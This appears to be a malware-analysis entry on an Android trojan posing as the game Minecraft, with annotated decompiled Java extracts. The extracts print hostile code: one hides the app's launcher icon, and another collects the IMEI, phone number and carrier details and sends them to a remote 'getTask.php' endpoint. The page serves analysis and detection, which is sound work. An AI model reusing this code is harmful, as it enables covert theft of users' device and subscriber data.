Summary
This malware steals confidential data from the telephone.
GroDDViewer graphs:
Details
Minecraft is a piece of malware discovered in January 2016. It is disguised as a game and sends data from the telephone when it is launched, and then again every 60000 seconds.
Stage 1: Malicious code execution
When the application is installed, the Minecraft icon appears on desktop.
Stage 2: Data sending
UpdateService repeatedly starts a BroadcastReceiver named UpdateReceiver, every 60000 seconds, through the use of ServiceReceiver.
Other resources
Triggering
To trigger the malware, launch the application.
Characteristics
Malware type :
Attacks :
-
Confidentiality
Infection technique :
Malicious code type :
Hiding techniques :
Triggering techniques :
Samples
Java source code extracts:
MainActivity.java is the service started when the application is launched.
l.java is the update service that sends data through a URL.
MainActivity.java
// Decompiled fragment of MainActivity; the method header and the start of its body are not part of this extract.
// NOTE(review): the decompiler did not recover the original control flow. The stray label, the
// `while (true)` wrapper and the `localExceptionN = localExceptionN` lines are decompiler artifacts,
// so the statement order below is not necessarily the execution order.
// Both locals are assigned outside this extract.
SharedPreferences localSharedPreferences;
SharedPreferences.Editor localEditor;
// VIEW intent for the URI stored in this.k.k; it becomes the target of the home-screen shortcut built below.
Intent localIntent1 = new Intent("android.intent.action.VIEW", Uri.parse(this.k.k));
// 268435456 == 0x10000000 == Intent.FLAG_ACTIVITY_NEW_TASK
localIntent1.addFlags(268435456);
// 67108864 == 0x04000000 == Intent.FLAG_ACTIVITY_CLEAR_TOP
localIntent1.addFlags(67108864);
// Shortcut request: target intent, label taken from this.k.j, icon taken from the drawable resource named "icon_url".
Intent localIntent2 = new Intent();
localIntent2.putExtra("android.intent.extra.shortcut.INTENT", localIntent1);
localIntent2.putExtra("android.intent.extra.shortcut.NAME", this.k.j);
// Both assertions are on values that cannot be null here (this, a string literal); they have no effect.
Assert.assertNotNull(this);
Assert.assertNotNull("icon_url");
localIntent2.putExtra("android.intent.extra.shortcut.ICON_RESOURCE", Intent.ShortcutIconResource.fromContext(this, getResources().getIdentifier("icon_url", "drawable", getPackageName())));
// Asks the launcher to add a home-screen shortcut that opens the this.k.k URI.
// Triage note: this broadcast is guarded by com.android.launcher.permission.INSTALL_SHORTCUT, so the
// permission should appear in the sample's manifest.
localIntent2.setAction("com.android.launcher.action.INSTALL_SHORTCUT");
sendBroadcast(localIntent2);
// Persists a "started" flag in the preferences; presumably a first-run marker so the shortcut is only
// installed once (the check that reads it is outside this extract, so confirm).
label244: localEditor.putBoolean("started", true);
localEditor.commit();
while (true)
{
// UI wiring. The numeric arguments are resource ids inlined at compile time; resolving them to names
// requires the sample's resource table.
this.f = ((TextView)findViewById(2131099651));
this.g = ((TextView)findViewById(2131099658));
this.h = ((TextView)findViewById(2131099659));
this.i = ((TextView)findViewById(2131099657));
this.j = ((Button)findViewById(2131099656));
// 8 == View.GONE: the button and three of the text views start hidden.
this.j.setVisibility(8);
this.g.setVisibility(8);
this.h.setVisibility(8);
this.i.setVisibility(8);
// Click handlers are the obfuscated classes c, d and e; their bodies are not shown on this page.
this.j.setOnClickListener(new c(this));
this.i.setOnClickListener(new d(this));
this.g.setText(Html.fromHtml("<u>" + getString(2130968587) + "</u>"));
this.g.setOnClickListener(new e(this, localSharedPreferences));
this.b = ((RoundProgress)findViewById(2131099655));
this.b.setProgress(0.0D);
this.e = 0;
// Runs task f immediately (delay 0) and then at a fixed rate of this.c milliseconds; neither the value
// of this.c nor the body of f is visible in this extract.
this.d = new Timer();
this.d.scheduleAtFixedRate(new f(this), 0L, this.c);
if (this.k.o == 1)
{
// Hiding technique: state 2 == PackageManager.COMPONENT_ENABLED_STATE_DISABLED, flag 1 ==
// PackageManager.DONT_KILL_APP. The activity disables its own component without killing the process;
// if this is the launcher activity, its icon disappears from the app drawer while the process keeps running.
ComponentName localComponentName = new ComponentName(this, getClass());
getPackageManager().setComponentEnabledSetting(localComponentName, 2, 1);
}
return;
localException1 = localException1;
// Starts UpdateService, the component the page describes as re-arming UpdateReceiver. Where this call
// sits in the real control flow cannot be told from the decompiled output.
startService(new Intent(this, UpdateService.class));
break;
localException2 = localException2;
}
l.java
/**
 * Collects device and subscriber identifiers and sends them as query parameters of an HTTP GET to
 * {@code UpdateService.d + "getTask.php"}, then starts reading the response body. The rest of the
 * method, including the catch clause and the return value, is elided in this extract.
 *
 * Triage note: a GET request for getTask.php carrying the parameters imei, balance, country, phone,
 * op, mnc, mcc, model and os is the network indicator this listing provides. The value of
 * UpdateService.d (scheme and host) is not shown on this page.
 */
private String a()
{
try
{
// "phone" == Context.TELEPHONY_SERVICE
TelephonyManager localTelephonyManager = (TelephonyManager)this.a.a.getSystemService("phone");
// Device identifier (IMEI/MEID). getDeviceId() and getLine1Number() below are guarded by
// READ_PHONE_STATE, so that permission should appear in the sample's manifest.
String str1 = localTelephonyManager.getDeviceId();
String str2 = localTelephonyManager.getSimCountryIso();
DefaultHttpClient localDefaultHttpClient = new DefaultHttpClient();
// Subscriber phone number as reported by the SIM; may be null or empty on some devices.
String str3 = localTelephonyManager.getLine1Number();
String str4 = localTelephonyManager.getSimOperatorName();
// Numeric MCC+MNC of the registered network; split into mcc/mnc when the URL is built.
String str5 = localTelephonyManager.getNetworkOperator();
String str6 = Integer.toString(Build.VERSION.SDK_INT);
String str7 = Build.MODEL;
// Builds the request by plain string concatenation. "balance" is read from the default shared
// preferences with "0" as fallback; what writes it is not shown here.
// str5.substring(...) throws StringIndexOutOfBoundsException when the operator string has fewer than
// 3 characters (e.g. no network registration); presumably swallowed by the elided catch (confirm).
URL localURL = new URL(UpdateService.d + "getTask.php?imei=" + str1 + "&balance=" + PreferenceManager.getDefaultSharedPreferences(this.a.a).getString("balance", "0") + "&country=" + str2 + "&phone=" + str3 + "&op=" + str4 + "&mnc=" + str5.substring(3) + "&mcc=" + str5.substring(0, 3) + "&model=" + str7 + "&os=" + str6);
// Rebuilds the URL through the multi-argument URI constructor, which quotes characters that are illegal
// in each component (e.g. spaces in the operator or model name), then issues the GET and opens the
// response stream.
InputStream localInputStream = localDefaultHttpClient.execute(new HttpGet(new URI(localURL.getProtocol(), localURL.getUserInfo(), localURL.getHost(), localURL.getPort(), localURL.getPath(), localURL.getQuery(), localURL.getRef()).toURL().toString())).getEntity().getContent();
// Response is read as UTF-8 text through an 8-character buffer; the handling of the returned task is
// in the elided part below.
BufferedReader localBufferedReader = new BufferedReader(new InputStreamReader(localInputStream, "utf-8"), 8);
StringBuilder localStringBuilder = new StringBuilder();
...
}
}